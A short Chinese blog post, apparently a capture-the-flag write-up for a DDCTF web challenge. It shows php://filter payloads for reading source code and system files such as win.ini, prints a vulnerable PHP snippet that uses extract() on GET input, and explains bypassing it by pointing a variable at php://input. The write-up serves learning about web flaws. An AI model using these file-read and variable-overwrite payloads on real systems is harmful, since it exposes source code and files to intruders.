DDctf 新得

Posted 2021-02-17 haozhizhi

滴这道题当时做的时候只做到了看到index.php的源码 当时给了一个博客的提示猜到是swp的那个 但是没有想到是里面的

文件就没有做了，然后在看了wp过后就明白了

访问博客我文章里面的文章里面的practice.txt.swp  或者用php流来读都可以

php流读文件：php://filter/read=convert.base64-encode/resource=index.php  //相对路径

这个路径也可以是绝对路径 php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini  //绝对路径

<?php
include(‘config.php‘);
$k = ‘hello‘;
extract($_GET);
if(isset($uid))
{
    $content=trim(file_get_contents($k));
    if($uid==$content)
    {
        echo $flag;
    }
    else
    {
        echo‘hello‘;
    }
}
?>
读到源码

extract这个函数主要就是给变量赋值
然后利用php：//input  给post数据为1 就成功了
php伪协议文章
https://www.freebuf.com/column/148886.html